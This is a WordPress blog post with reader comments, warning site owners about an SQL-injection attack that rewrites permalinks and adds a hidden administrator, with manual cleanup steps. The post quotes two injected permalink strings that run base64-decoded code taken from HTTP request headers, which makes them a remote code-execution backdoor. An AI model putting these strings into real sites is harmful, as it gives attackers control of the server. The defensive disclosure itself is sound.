Beginner's Guide for WordPress - Start your WordPress Blog in minutes.
Choosing the Best
WordPress Hosting
How to Easily
Install WordPress
Recommended
WordPress Plugins
View all Guides

WordPress SQL Injection – Latest Attack

Last updated on by
Follow WPBeginner on YouTube
WordPress SQL Injection – Latest Attack

A lot of sites are being hit by a recent SQL attack where codes are being injected to your site. This MySQL injection affects your permalinks by making them ineffective. As a result, your blog posts URLs will not work. Numerous WordPress blogs were targetted in this attack, Thanks to Andy Soward for bringing this to our attention.

There was one of the following codes that were added to your permalink structure due to this attack:

%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%

“/%&(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_EXECCODE%5D))%7D%7D|.+)&%

These quotes appended all permalinks on your site and it can only be changed if removed manually.

To fix this go to:

Settings > Permalinks and remove the above code and replace your default code.

Next thing you need to do is go to Users. You will see that there are more than one administrator. You won’t see their name listed, but you will see the count increased. So what you need to do is look at all users and find the last one who registered. Put your mouse over that user and get the link. Change the code userid= by adding 1 to that number. So if the last user who you can see was user #2 then add 1 to it and make it 3. You should find the hidden admin has a weird code as a first name. Delete the code and make him a subscriber. Then return and delete him.

This should fix the problem. You can also delete him by simply going to your PHPMyAdmin. Because you will see the user there.

We just wanted to get this news out as soon as we can, so our users can be updated. Please make sure that you check that your blog is not infected. We hope that WordPress come out with a release soon.

Also if you haven’t implement some of these measures to secure your WordPress Admin Area.


Editorial Staff at WPBeginner is a team of WordPress lovers led by Syed Balkhi. Page maintained by Syed Balkhi.

WPBeginner's Video Icon
Our HD-Quality tutorial videos for WordPress Beginners will teach you how to use WordPress to create and manage your own website in about an hour. Get started now »
  • ahmed_alaaedin

    The database of my website has been injected few days ago, adding some strange characters and words after each post or page URL. I couldn’t find anything strange in the settings: permalinks or in the users menu. What to do to fix this problem, please? My hosting company has a backup of the infected database as well!

  • a wordpress user

    i was hit by this twice.

    first time it was wassup plugin sql injection, this time im not sure. my hosting provider has blocked me.

    once they restore my a/c i will remove wordpres.. I have had it!

    • http://www.wpbeginner.com Editorial Staff

      Perhaps its not WordPress fault, maybe your hosting security is just not as good…

  • http://lerrkin.livejournal.com lerrkin

    Hi.
    Interesting url http://www.wpbeginner.com/wp-tutorials/11-vital-tips-and-hacks-to-protect-your-wordpress-admin-area/ linked from here shows blank page.

    Code contains this comment: ‘‘.
    That’s WP Super Cache’s bug http://wordpress.org/support/topic/315446, and it seems present here… So update WP Super Cache, please. I hope read that tips soon :)

    • http://www.wpbeginner.com Editorial Staff

      We really appreciate this comment, the issue was not with the WP Super Cache, we believe it was the plugin called WP External Link. We uninstalled and reinstalled WP-Super Cache twice, but then we compared the development server where everything worked fine. The difference was this plugin. When we removed that plugin it worked. You may now read that post.

      • http://lerrkin.livejournal.com lerrkin

        Maybe that was WP External Link and Super Cache conflict…
        I see my pasted WP-Super-Cache html comment above works as html comment and is invisible :) Text was “Page not cached by WP Super Cache. No closing HTML tag. Check your theme”.
        So last Super Cache ver. promises to do not html validity check.

        Oh, I’m reading!
        Thanks a lot!

  • http://www.ezyblogger.com/ Roseli A. Bakar

    Thanks for highlighting this :)